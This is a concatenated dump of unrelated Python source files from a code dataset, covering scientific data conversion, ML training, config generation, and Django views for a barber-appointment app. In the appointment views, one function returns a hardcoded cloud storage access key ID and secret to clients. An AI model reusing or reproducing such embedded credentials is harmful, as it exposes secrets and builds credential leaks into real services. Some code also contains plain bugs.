up the VTK type for a give python data type.\n\n Return:\n int : the integer type id specified in vtkType.h\n \"\"\"\n typ = nps.get_vtk_array_type(typ)\n if typ is 3:\n return 13\n return typ\n\ndef converStringArray(arr):\n \"\"\"A helper to convert a numpy array of strings to a vtkStringArray\n\n Return:\n vtkStringArray : the converted array\n \"\"\"\n vtkarr = vtk.vtkStringArray()\n for val in arr:\n vtkarr.InsertNextValue(val)\n return vtkarr\n\ndef ConvertArray(arr):\n \"\"\"A helper to convert a numpy array to a vtkDataArray\n\n Return:\n vtkDataArray : the converted array\n\n Note:\n this converts the data array but does not set a name. The name must be set for this data array to be added to a vtkDataSet ``array.SetName('Data')``\n \"\"\"\n arr = np.ascontiguousarray(arr)\n typ = getVTKtype(arr.dtype)\n if typ is 13:\n VTK_data = converStringArray(arr)\n else:\n VTK_data = numToVTK(arr, array_type=typ)\n return VTK_data\n\n\ndef placeArrInTable(ndarr, titles, pdo):\n \"\"\"Takes a 1D/2D numpy array and makes a vtkTable of it\n\n Args:\n ndarr (numpy.ndarray) : The 1D/2D array to be converted to a table\n titles (list or tuple): The titles for the arrays in the table. Must have same number of elements as columns in input ndarray\n pdo (vtkTable) : The output data object pointer\n\n Return:\n vtkTable : returns the same input pdo table\n \"\"\"\n # Put columns into table\n if len(np.shape(ndarr)) > 2:\n raise _helpers.PVGeoError('Input np.ndarray must be 1D or 2D to be converted to vtkTable.')\n if len(np.shape(ndarr)) == 1:\n # First check if it is an array full of tuples (varying type)\n if isinstance(ndarr[0], (tuple, np.void)):\n for i in range(len(titles)):\n placeArrInTable(ndarr['f%d' % i], [titles[i]], pdo)\n return pdo\n # Otherwise it is just a 1D array which needs to be 2D\n else:\n ndarr = np.reshape(ndarr, (-1, 1))\n cols = np.shape(ndarr)[1]\n\n for i in range(cols):\n VTK_data = ConvertArray(ndarr[:,i])\n VTK_data.SetName(titles[i])\n pdo.AddColumn(VTK_data)\n return pdo\n\n\n\ndef getdTypes(dtype='', endian=None):\n \"\"\"This converts char dtypes and an endian to a numpy and VTK data type.\n\n Return:\n tuple (numpy.dtype, int) : the numpy data type and the integer type id specified in vtkType.h for VTK data types\n \"\"\"\n # If native `@` was chosen then do not pass an endian\n if endian is '@':\n #print('WARNING: Native endianness no longer supported for packed binary reader. Please chose `>` or `<`. This defaults to big `>`.')\n endian = ''\n # No endian specified:\n elif endian is None:\n endian = ''\n # Get numpy and VTK data types and return them both\n if dtype is 'd':\n vtktype = vtk.VTK_DOUBLE\n elif dtype is 'f':\n vtktype = vtk.VTK_FLOAT\n elif dtype is 'i':\n vtktype = vtk.VTK_INT\n else:\n raise _helpers.PVGeoError('dtype \\'%s\\' unknown:' % dtype)\n # Return data types\n dtype = np.dtype('%s%s' % (endian, dtype))\n return dtype, vtktype\n\n\ndef cleanDataNm(dataNm, FileName):\n \"\"\"A helper to clean a FileName to make a useful data array name\"\"\"\n if dataNm is None or dataNm == '':\n dataNm = os.path.splitext(os.path.basename(FileName))[0]\n return dataNm\n\n\ndef createModifiedCallback(anobject):\n import weakref\n weakref_obj = weakref.ref(anobject)\n anobject = None\n def _markmodified(*args, **kwars):\n o = weakref_obj()\n if o is not None:\n o.Modified()\n return _markmodified\n","sub_path":"PVGeo/_helpers/readers.py","file_name":"readers.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"457282657","text":"f = open('./input/rosalind_lexf.txt', 'r')\ns=f.readline().strip().split(' ')\nn=int(f.readline())\n\ndef affiche(taille):\n if taille>0:\n tmp_list=affiche(taille-1)\n res=[]\n for i in s:\n res.extend([i+elt for elt in tmp_list])\n return res\n else:\n return ['']\n \nfor i in affiche(n):\n print(i)\n\n","sub_path":"Rosalind/AC/LEXF.py","file_name":"LEXF.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"240062829","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport mxnet as mx\nfrom mxnet import gluon, autograd, nd\nfrom mxnet import init\nimport utils\n\n\n########################################################################################################################\n##### MNIST\nfrom cnn.load_datasets import Preprocessing\n\npath = 'dataset/image/MonkeySpecies2'\nimage_resize = 96\nbatch_size = 32\n\na = Preprocessing()\na.setdata(path, image_resize, batch_size)\ntrain_iter, test_iter = a.MNIST()\n\n\n########################################################################################################################\nfrom cnn.image_preprocessing import Preprocessing\n\npath = 'dataset/image/MonkeySpecies2'\nimage_resize = 96\nbatch_size = 32\n\na = Preprocessing()\na.setdata(path, image_resize, batch_size)\ntrain_iter, test_iter = a.MNIST()\n\n################## model\nfrom mxnet.gluon.model_zoo import vision\nctx = mx.cpu()\nnet = vision.resnet18_v1(classes=10, pretrained=False)\n\n\n\n\n\n########################################################################################################################\nimport sys\nimport os\nimport json\nimport numpy as np\nimport mxnet as mx\nfrom mxnet import nd, gluon, autograd\nfrom mxnet.gluon import nn\nfrom time import time\nfrom matplotlib import pyplot as plt\nfrom sklearn import metrics\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import f1_score\nfrom gluoncv.data.transforms.presets.imagenet import transform_eval\n\ndef evaluate_accuracy(data_iterator, net, ctx):\n acc = mx.metric.Accuracy()\n for i, (data, label) in enumerate(data_iterator):\n predictions = nd.argmax(net(data.as_in_context(ctx)), axis=1)\n acc.update(preds=predictions, labels=label.as_in_context(ctx))\n return acc.get()[1]\n\n\n\n\nmx.random.seed(1)\nepochs = 1\nlr = 0.1\nnum_workers = 0\nsoftmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()\nmetric = mx.metric.Accuracy()\n\n# Initialize parameters randomly\nnet.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx, force_reinit=True)\ntrainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate': lr})\n\ntrain_start = time()\nall_train_mse = []\nall_test_mse = []\ntest_label = []\ntrain_imgs = []\nscores_test = []\n\nfor e in range(epochs):\n for i, (data, label) in enumerate(train_iter):\n data = data.as_in_context(ctx)\n label = label.as_in_context(ctx)\n # Wait for completion of previous iteration to\n # avoid unnecessary memory allocation\n nd.waitall()\n with autograd.record():\n output = net(data)\n loss = softmax_cross_entropy(output, label)\n loss.backward()\n trainer.step(data.shape[0])\n metric.update([label], [output])\n if i % 10 == 0 and i > 0:\n name, acc = metric.get()\n print('[Epoch %d Batch %d] Training: %s=%f' % (e, i, name, acc))\n sys.stdout.flush()\n\n train_mse = evaluate_accuracy(train_iter, net, ctx)\n test_mse = evaluate_accuracy(test_iter, net, ctx)\n all_train_mse.append(train_mse)\n all_test_mse.append(test_mse)\n\n name, acc = metric.get()\n print('[Epoch %d] Training: %s=%f' % (e, name, acc))\n sys.stdout.flush()\n\nsave_model(\"model_trained\")\n\neval_start = time()\nprint(\"{} workers: train duration {:.4}\".format(\n num_workers, eval_start - train_start))\nsys.stdout.flush()\n\nplt.plot(all_train_mse)\nplt.plot(all_test_mse)\nplt.xlabel('epochs')\nplt.ylabel('accuracy')\nplt.title('Accuracy')\nplt.legend(['train', 'valid'])\nplt.savefig('accuracy.jpg')\n\nfor i, (data, label) in enumerate(test_iter):\n\n if i % 10 == 0 and i > 0:\n name, acc = metric.get()\n print('[Epoch %d Batch %d] Training: %s=%f' % (e, i, name, acc))\n predictions = nd.argmax(net(data.as_in_context(ctx)), axis=1)\n test_label.append(label)\n scores_test.append(predictions)\n\ntest_label = nd.concat(*test_label, dim=0)\nscores_test = nd.concat(*scores_test, dim=0)\n# print(test_label)\n# print(\"----------------\")\n# print(scores_test)\nmax = np.max(test_label.asnumpy())\n\nmyClasses = list(range(0, int(max + 1), 1))\nlabel = label_binarize(test_label.asnumpy(), classes=myClasses)\npred = label_binarize(scores_test.asnumpy(), classes=myClasses)\nplt.clf()\nfpr = dict()\ntpr = dict()\nroc_auc = dict()\nfor i in range(int(max + 1)):\n fpr[i], tpr[i], _ = metrics.roc_curve(label[:, i], pred[:, i])\n roc_auc[i] = metrics.auc(fpr[i], tpr[i])\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr[0], tpr[0], label='ROC curve (area = %0.2f)' % roc_auc[0])\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.savefig('roc_curve.jpg')\n\n# precision\nprecision = precision_score(y_true=test_label.asnumpy(), y_pred=scores_test.asnumpy(),\n average='weighted') # , zero_division=0)\nprint('Precision: %f' % precision)\n# recall\nrecall = recall_score(y_true=test_label.asnumpy(), y_pred=scores_test.asnumpy(), average='weighted')\nprint('Recall: %f' % recall)\n# f1_score\nf1 = f1_score(y_true=test_label.asnumpy(), y_pred=scores_test.asnumpy(), average='weighted')\nprint('F1 score: %f' % f1)","sub_path":"test/load_dataset_test_trainer.py","file_name":"load_dataset_test_trainer.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"112518861","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas\nfrom datetime import datetime\n\n\ndatafile = '/Users/ivanov/Yandex.Disk.localized/DESY_2018/Ti45Nb/Ti45Nb_1.log'\nsavefile = '/Users/ivanov/Yandex.Disk.localized/DESY_2018/Ti45Nb/dilatometer_data.txt'\n\ndata = pandas.read_csv(datafile, header = 8, sep = '\\s+')\ndata = pandas.DataFrame(data).values\n\ntime = data[:,0]\n\n\nfmt = '%H:%M:%S'\nsec = [0]\nsumm_seconds = [0]\nfor i in range(len(time)-1):\n d1 = datetime.strptime(time[i],fmt)\n d2 = datetime.strptime(time[i+1],fmt)\n diff=d2-d1\n total_seconds=diff.seconds\n sec.append(total_seconds)\n summ = np.sum(sec)\n summ_seconds.append((summ))\n\ntrue_time = summ_seconds\ntemperature = data[:,-2]\ndilatometer = data[:,-1]\n\ntrue_temperature = []\nfor temp in temperature:\n try:\n t = float(temp)\n true_temperature.append(t)\n except:\n true_temperature.append(25)\n\n\ntrue_dilatometer = []\nfor value in dilatometer:\n try:\n t = float(value)\n true_dilatometer.append(t)\n except:\n true_dilatometer.append(0)\n\n\ndatasave = np.array((np.row_stack((np.array(true_time), np.array(true_temperature), np.array(true_dilatometer)))).T)\n\nnp.savetxt(savefile, datasave, fmt = '%.i %.2f %.2f')\n\n","sub_path":"DESY_2018/import_dilatometer.py","file_name":"import_dilatometer.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458219910","text":"import json\nimport argparse\nfrom pathlib import Path\nimport yaml\n\n\nclass ConfigBuilder:\n def __init__(self, config, options):\n self.config = config\n self.options = options\n\n def set_option(self, option_name, category=None, alt_config_name=None):\n # if overwrite is disabled (False), check if set and, if so, skip\n if not self.overwrite:\n name = self._config_name(option_name, alt_config_name)\n if self.get_config(name, category) is not None:\n return\n\n # some options are optional, skip them if not set\n if self.options.get(option_name, None) is not None:\n\n if category:\n if self.config.get(category, None) is None:\n self.config[category] = dict()\n self.config[category][self._config_name(\n option_name, alt_config_name)] = self.options[option_name]\n else:\n self.config[self._config_name(\n option_name, alt_config_name)] = self.options[option_name]\n\n def get_config(self, config_name, category=None):\n # return a configuration variable.\n if category:\n try:\n return self.config.get(category).get(config_name, None)\n except AttributeError:\n return None\n else:\n return self.config.get(config_name, None)\n\n def get_device_config(self, device_id, setting):\n # return a device configuration variable, for testing purposes\n return self.config.get(\"devices\").get(device_id).get(setting, None)\n\n def dump(self, config_path):\n with open(config_path, 'w') as f:\n yaml.safe_dump(self.config, f, default_flow_style=False)\n\n def set_log_dir(self, data_path):\n if self.options.get(\"log_directory\", None):\n if self.config.get(\"advanced\", None) is None:\n self.config[\"advanced\"] = dict()\n log_dir = Path(data_path).joinpath(\n self.options.get(\"log_directory\"))\n self.config[\"advanced\"][\"log_directory\"] = log_dir\n\n def set_devices_config(self, devices):\n self.config[\"devices\"] = dict()\n for device in devices:\n self.config[\"devices\"][device[\"id\"]] = {\n k: v\n for k, v in device.items()\n }\n\n @property\n def overwrite(self):\n # overwrite is enabled by default. Only return false if the option is\n # explicitly set to false\n overwrite = self.options.get(\"overwrite\", None)\n if overwrite is None: # not set, return True\n return True\n else:\n # return False only if overwrite is set to False\n return True if overwrite is True else False\n\n def _config_name(self, name, alt=None):\n if alt is None:\n return name\n else:\n return alt\n\n\ndef main(options_path, data_path):\n\n config = dict()\n config_path = Path(data_path).joinpath('configuration.yaml')\n if config_path.is_file(): # check if config file exists in data path\n # TODO: Change this to accomodate overwrite option\n print(\"[Info] Configuration file found: {}\".format(config_path))\n with open(config_path) as f:\n config = yaml.safe_load(f)\n else: # make sure the data_path folder exists; if not, create it\n if not Path(data_path).is_dir():\n Path(data_path).mkdir()\n\n with open(options_path) as f:\n options = json.load(f)\n\n cfg = ConfigBuilder(config, options)\n\n if not cfg.overwrite:\n print(\n \"[Info] overwrite is disabled, will not overwrite options defined in {}\"\n .format(config_path))\n\n cfg.set_option('homeassistant')\n cfg.set_option('permit_join')\n\n cfg.set_option(\n 'mqtt_base_topic', category='mqtt', alt_config_name='base_topic')\n cfg.set_option('mqtt_server', category='mqtt', alt_config_name='server')\n cfg.set_option(\n 'mqtt_client_id', category='mqtt', alt_config_name='client_id')\n cfg.set_option('include_device_information', category='mqtt')\n cfg.set_option('reject_unauthorized', category='mqtt')\n\n if options.get(\"mqtt_user\", None) or options.get(\"mqtt_pass\", None):\n cfg.set_option('mqtt_user', category='mqtt', alt_config_name='user')\n cfg.set_option(\n 'mqtt_pass', category='mqtt', alt_config_name='password')\n\n cfg.set_option('serial_port', category='serial', alt_config_name='port')\n cfg.set_option('disable_led', category='serial')\n\n cfg.set_option('cache_state', category='advanced')\n\n cfg.set_log_dir(data_path)\n\n cfg.set_option('log_level', category='advanced')\n cfg.set_option('rtscts', category='advanced')\n\n cfg.set_option('soft_reset_timeout', category='advanced')\n\n cfg.set_option('pan_id', category='advanced')\n cfg.set_option('channel', category='advanced')\n\n cfg.set_option('report', category='advanced')\n\n cfg.set_option('availability_timeout', category='advanced')\n cfg.set_option('last_seen', category='advanced')\n cfg.set_option('elapsed', category='advanced')\n\n # set device-specific settings. skips if empty list\n if options.get(\"devices\", None):\n cfg.set_devices_config(options.get(\"devices\"))\n # set network key. skips if empty list\n if options.get(\"network_key\", None):\n cfg.set_option('network_key', category='advanced')\n\n cfg.dump(config_path)\n print('[Info] Configuration written to {}'.format(config_path))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Construct an appropriate yaml configuration file.')\n parser.add_argument('options_path', type=str)\n parser.add_argument('data_path', type=str)\n parser.set_defaults(mqtt_user=None, mqtt_pass=None)\n args = parser.parse_args()\n main(args.options_path, args.data_path)\n","sub_path":"zigbee2mqtt/set_config.py","file_name":"set_config.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"50065408","text":"'''\nThe main bits of dingo\n'''\n\n\n# system imports\nimport click\nimport os\nimport sys\n\n# local imports\nfrom jellyfish import JellyFish\nimport input_reader\nimport random_forest\n\n@click.command()\n@click.option(\"-k\", \"--ksize\", help = \"Kmer size to search for.\", default = 31, show_default = True)\n@click.option(\"-a\", \"--hashsize\", help = \"Hash size\", default = '5M', show_default = True)\n@click.option(\"--min_number\", help = \"Minimum number of kmer observations to count.\", default = 10, show_default = True)\n@click.option(\"--sreads\", help = \"Number of files to read simultaneously by jellyfish\", default = 2, show_default = True)\n@click.option(\"--nbytes\", help = \"Size of the number used for counting kmers\", default = 1, show_default = True)\n@click.option(\"-s\", \"--single_end\", is_flag = True, default = False, help = \"Data is single end\")\n@click.option(\"-f\", \"--force\", is_flag = True, default = False, help = \"Write over previous analysis\")\n@click.option(\"-o\", \"--outdir\", help = \"Output folder\")\n@click.option(\"-i\", \"--input_file\", help = \"Input file.\")\n@click.option(\"--kmer_fa\", help = \"A FASTA of kmers to count\", default = 'allcount.fa')\n@click.option(\"-t\", \"--threads\", help = \"Number of threads to run Jellyfish\", default = 16, show_default = True)\n@click.option(\"-p\",\"pickled_matrix\", help = \"Use a pickeled matrix\", default = \".kmer_table.pickle\", show_default = True)\n### random forest options\n@click.option(\"-n\", \"--n_trees\", help = \"Number of trees to grow\", default = 10, show_default = True)\n@click.option(\"-c\", \"--criterion\", help = 'Criterion to decide on optimal split ', default = \"entropy\", show_default = True)\n@click.option(\"-m\", \"--max_features\", help = \"Maximum number of features to consider for each tree\", default = \"sqrt\", show_default = True)\ndef main(input_file, ksize, hashsize, min_number, sreads, nbytes, single_end, force, outdir, threads, n_trees, criterion, max_features, kmer_fa, pickled_matrix):\n # check that necessary software exists, otherwise quit\n jf = JellyFish()\n jf.exists()\n\n # do some parameter checking\n max_features = random_forest.test_max_features(max_features)\n\n # check that outdir already exists, if NOT force, then quit\n\n # load input file --- check that paths exist otherwise quit\n data = input_reader.read(input_file)\n\n # create response variable\n y = [s[1] for s in data]\n\n # create output folder structure --- if can't write quit\n\n # run jellyfish to identify all the kmers\n # only run it if necessary\n if (os.path.exists(pickled_matrix) and not force):\n print(\"Found a pickled kmer matrix, going to use it...\")\n X,kmers = jf.load_kmertable(pickle_file = pickled_matrix)\n else:\n if (kmer_fa == None or not os.path.isfile(kmer_fa)):\n jf.count_all_mers(data, ksize, hashsize, threads = threads, min_number = min_number, simult_read = sreads, n_bytes = nbytes)\n else:\n print(\"Found {}, so skipping counting kmers across all samples\" .format(kmer_fa), file = sys.stderr)\n # run jellyfish to count kmers in individual isolates\n jf.count_ind_mers(data, ksize, hashsize, threads = threads, min_number = min_number, simult_read = sreads, n_bytes = nbytes)\n # merge individual jellyfish results to generate our input matrix\n print(\"Generating kmer table...\", file = sys.stderr)\n X,kmers = jf.join_counts(data)\n print(\"Learning about the kmers...\", file = sys.stderr)\n # run random forests to learn something\n learn = random_forest.learn(X = X, y = y, n_trees = n_trees, criterion = criterion, max_features = max_features)\n print(\"Computing importance of kmers...\", file = sys.stderr)\n kmer_imp = random_forest.importance(learn, kmers)\n print(\"Making predictions...\", file = sys.stderr)\n print(learn.predict(X), file = sys.stderr)\n #print(learn.predict_log_proba(X), file = sys.stderr)\n print(kmer_imp.head(), file = sys.stderr)\n kmer_imp.to_csv(\"junk.csv\")\n pass\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dingo/dingo.py","file_name":"dingo.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280173308","text":"#regression demo 代码\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef gradient_decent(_x_data, _y_data, _b, _w, _iteration, _lr):\n \"\"\"\n Gradient Decent\n :param _x_data:\n :param _y_data:\n :param _b:\n :param _w:\n :param _iteration:\n :param _lr:\n :return:\n \"\"\"\n _b_history = [_b]\n _w_history = [_w]\n\n for _i in range(_iteration):\n b_grad = 0.0\n w_grad = 0.0\n\n for _n in range(len(x_data)):\n b_grad = b_grad - 2.0 * (y_data[_n] - _b - _w * _x_data[_n]) * 1.0\n w_grad = w_grad - 2.0 * (y_data[_n] - _b - _w * _x_data[_n]) * _x_data[_n]\n\n _b = _b - _lr * b_grad\n _w = _w - _lr * w_grad\n\n _b_history.append(_b)\n _w_history.append(_w)\n return _b_history, _w_history\n\n\ndef adagrad(_x_data, _y_data, _b, _w, _iteration, _lr):\n \"\"\"\n Adagrad: auto adapt the learning rate.\n :param _x_data:\n :param _y_data:\n :param _b:\n :param _w:\n :param _iteration:\n :param _lr:\n :return:\n \"\"\"\n _b_history = [_b]\n _w_history = [_w]\n lr_b = 0\n lr_w = 0\n\n for _i in range(_iteration):\n b_grad = 0.0\n w_grad = 0.0\n\n for _n in range(len(x_data)):\n b_grad = b_grad - 2.0 * (y_data[_n] - _b - _w * _x_data[_n]) * 1.0\n w_grad = w_grad - 2.0 * (y_data[_n] - _b - _w * _x_data[_n]) * _x_data[_n]\n\n lr_b = lr_b + b_grad ** 2\n lr_w = lr_w + w_grad ** 2\n _b = _b - _lr / np.sqrt(lr_b) * b_grad\n _w = _w - _lr / np.sqrt(lr_w) * w_grad\n\n _b_history.append(_b)\n _w_history.append(_w)\n return _b_history, _w_history\n\n\ndef plot_result(_b_history, _w_history):\n \"\"\"\n Plot Result\n :param _b_history:\n :param _w_history:\n :return:\n \"\"\"\n plt.contourf(x, y, z, 50, alpha=0.5, cmap=plt.get_cmap('jet'))\n plt.plot([-188.4], [2.67], 'x', ms=12, markeredgewidth=3, color='orange')\n plt.plot(_b_history, _w_history, 'o-', ms=3, lw=1.5, color='black')\n plt.xlim(-200, -100)\n plt.ylim(-5, 5)\n plt.xlabel(r'$b$', fontsize=16)\n plt.ylabel(r'$w$', fontsize=16)\n plt.show()\n\n\nif __name__ == '__main__':\n x_data = [338., 333., 328., 207., 226., 25., 179., 60., 208., 606.]\n y_data = [640., 633., 619., 393., 428., 27., 193., 66., 226., 1591.]\n\n x = np.arange(-200, -100, 1) # bias\n y = np.arange(-5, 5, 0.1) # weight\n z = np.zeros((len(x), len(y)))\n X, Y = np.meshgrid(x, y)\n\n for i in range(len(x)):\n for j in range(len(y)):\n b = x[i]\n w = y[j]\n z[j][i] = 0\n\n for n in range(len(x_data)):\n z[j][i] = z[j][i] + (y_data[n] - b - w * x_data[n]) ** 2\n\n z[j][i] = z[j][i] / len(x_data)\n\n b = -120\n w = -4\n lr = 1\n iteration = 100000\n\n # b_history, w_history = gradient_decent(x_data, y_data, b, w, iteration, lr)\n b_history, w_history = adagrad(x_data, y_data, b, w, iteration, lr)\n\n plot_result(b_history, w_history)\n","sub_path":"course_gd.py","file_name":"course_gd.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75017773","text":"from .test_client import TestClient\nimport numpy as np\nfrom multiprocessing import Process,Lock\nimport pickle\n\nmutex = Lock()\n\nclass MotionData(object):\n\n\n def __init__(self, num_length):\n self.test_client = TestClient()\n #self.data_array = np.zeros(num_length)\n #self.data_array = np.zeros(num_length)\n self.data_array = [None] * num_length\n self.num_length = num_length\n \n \n def receive_data(self, data):\n #print( \"Received data from client\", data)\n rec_num = data\n\n #self.data_array[2:] = self.data_array[1:]\n \n #make a running buffer\n with mutex:\n self.data_array.insert(0,rec_num)\n self.data_array.pop()\n \n #save data to a \n \n\n def start(self):\n self.test_client.dataListener = self.receive_data\n self.test_client.run()\n print('Start the interface thread')\n \n def stop(self):\n pass\n \n def get(self):\n current_value = None\n with mutex:\n current_value = self.data_array[0]\n #return the latest saved data\n return current_value","sub_path":"riglib/multithread_test/test_BMI3D_interface.py","file_name":"test_BMI3D_interface.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"416025710","text":"from robust.exception import *\nfrom django.http import HttpResponse\nfrom customer.customers import CustomersManager, CustomerProxy\nfrom barber.barbers import BarbersManager, CommentManager\nfrom appointment.appt import *\nfrom utilities.common import encode, current_time\n\n\ndef quick_appt(request):\n result = {'code': 100, 'log': 'Order has been sent to the barber end.'}\n re_data = None\n try:\n #result = {'code': 100, 'log': 'Order has been sent to the barber end.'}\n data = Checker.request(request, ['phone', 'name', 'longitude', 'latitude', 'sex'])\n try:\n _ = CustomerProxy(data['phone'])\n except CustomerDoesNotExistError:\n CustomersManager.add_customer(phone=data['phone'], name=data['name'], sex=data['sex'])\n order = OrdersManager.add_order(cus_phone=data['phone'])\n barbers, dis = BarbersManager.get_near_barber(longitude=float(data['longitude']),\n latitude=float(data['latitude']), range_=1500)\n push_order_to_barber_test(order=order, barbers=barbers, dis_list=dis)\n\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n\n\ndef normal_appt(request):\n result = {'code': 100, 'log': 'Barber list has been returned.'}\n re_data = None\n try:\n data = Checker.request(request, ['longitude', 'latitude', 'date'])\n barbers, dis_list = BarbersManager.get_near_barber(longitude=float(data['longitude']),\n latitude=float(data['latitude']), range_=1500)\n barbers = process_time(barbers=barbers, date=data['date'])\n l = len(barbers)\n for i in range(0, l):\n barbers[i]['distance'] = dis_list[i]\n barbers.sort(key=lambda d: d['distance'])\n if not barbers:\n raise NoBarberHasRegister\n re_data = barbers\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n\n\ndef submit_order(request):\n result = {'code': 100, 'log': 'Has notified the barber.'}\n re_data = None\n try:\n data = Checker.request(request, ['barphone', 'cusphone', 'cusname', 'sex',\n 'time', 'distance', 'hairstyle', 'remark'])\n #try:\n # _ = CustomerProxy(data['cusphone'])\n #except CustomerDoesNotExistError:\n CustomersManager.add_customer(phone=data['cusphone'], name=data['cusname'], sex=data['sex'])\n\n #time_conflict(phone=data['cusphone'], time_=data['time']) # ??\n order_clash(bar_phone=data['barphone'], time_=data['time'])\n time_ = calculate_order_time(hairstyle=data['hairstyle'], time_=data['time'])\n\n order = OrdersManager.add_order(cus_phone=data['cusphone'], bar_phone=data['barphone'],\n time_=time_, hairstyle=data['hairstyle'],\n remark=data['remark'], accepted=True).get_dict()\n order.pop('accepted')\n push_msg(alias=order['barphone'], msg=order)\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n\n\ndef is_register(request):\n result = {'code': 100, 'log': \"User has existed,return user's info\"}\n re_data = None\n try:\n data = Checker.request(request, ['phone'])\n customer = CustomerProxy(data['phone'])\n re_data = customer.get_dict()#会返回头像\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n\n\ndef get_barber(request):\n result = {'code': 100, 'log': 'Barber info has returned.'}\n re_data = None\n try:\n data = Checker.request(request, ['phone', 'date'])\n #re_data = process_time(barbers=[BarberProxy(data['phone'])], date=data['date'])[0]\n #怎么感觉这个get barber 有问题 应该返回的是用户请求的时间段的的理发师\n re_data = process_time(barbers=[BarberProxy(data['phone'])], date=data['date'])[0]\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n\n\ndef update_name(request):\n result = {'code': 100, 'log': \"Customer's name update success!\"}\n re_data = None\n try:\n data = Checker.request(request, ['phone', 'name'])\n CustomerProxy(phone=data['phone']).name = data['name']\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n\n\ndef update_sex(request):\n result = {'code': 100, 'log': \"Customer's sex update success!\"}\n re_data = None\n try:\n data = Checker.request(request, ['phone', 'sex'])\n CustomerProxy(phone=data['phone']).sex = data['sex']\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n\n\ndef update_profile(request):\n result = {'code': 100, 'log': '文件上传所需信息已返回'}\n re_data = None\n try:\n data = Checker.request(request, ['phone'])\n customer = CustomerProxy(phone=data['phone'])\n customer.profile = 'profile/customer/' + customer.phone + '.png'\n re_data = {'key': customer.profile,\n 'bucket_name': 'jianyue-img',\n 'access_key_id': 'DS1sGprn39SnhFDV',\n 'access_key_secret': 'dFmlLMHapOfyUKTDeeUFCp7M64U1aD',\n }\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n #return HttpResponse(encode(result))\n\n\ndef update_phone(request):\n result = {'code': 100, 'log': \"Customer's phone has update successfully!\"}\n re_data = None\n try:\n data = Checker.request(request, ['phone', 'phone_u'])\n CustomerProxy(phone=data['phone']).phone = data['phone_u']\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n pass\n#comment barber\ndef comment(request):\n result = {'code': 100, 'log': 'Comment submit successfully'}\n re_data = None\n #从request中取出customer信息\n #获取评论内容\n #获取评级\n #获取当前时间\n #添加信息到数据库\n try:\n data = Checker.request(request, ['cus_phone', 'bar_phone', 'content', 'rank'])\n CommentManager.add_comment(content=data['content'],\n cus_phone=data['cus_phone'],\n bar_phone=data['bar_phone'],\n rank=data['rank'],\n time=current_time())\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data;\n return HttpResponse(encode(result))","sub_path":"customer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"121903546","text":"import http.server\nimport json\nfrom python.RequestHandler import Handler\nimport mimetypes\n\nhandler = Handler()\n\nmimetypes.init()\nmimetypes.add_type('text/javascript', '.js', strict=True)\n\n\ndef __init__():\n return\n\n\nclass ApplicationServer (http.server.SimpleHTTPRequestHandler):\n def do_POST(self):\n uri = self.requestline.split(' ')[1]\n if uri != '/api':\n print('Wrong API uri: {0}'.format(uri))\n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/json\")\n self.end_headers()\n self.wfile.write(bytes(json.dumps({\n 'ok': False,\n 'description': 'Wrong API uri'\n }), 'utf-8'))\n return\n\n bodyLength = int(self.headers.get('content-length', 0))\n body = self.rfile.read(bodyLength).decode('utf-8')\n parsedBody = []\n try:\n parsedBody = json.loads(body)\n except:\n self.send_response(400)\n self.end_headers()\n self.wfile.write(b'Error 400: Not a JSON request')\n\n resp = handler.handle_request(parsedBody)\n\n #print('Sending response: ')\n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/json\")\n self.end_headers()\n self.wfile.write(bytes(json.dumps(resp), 'utf-8'))\n\n def do_GET(self):\n filepath = ''\n 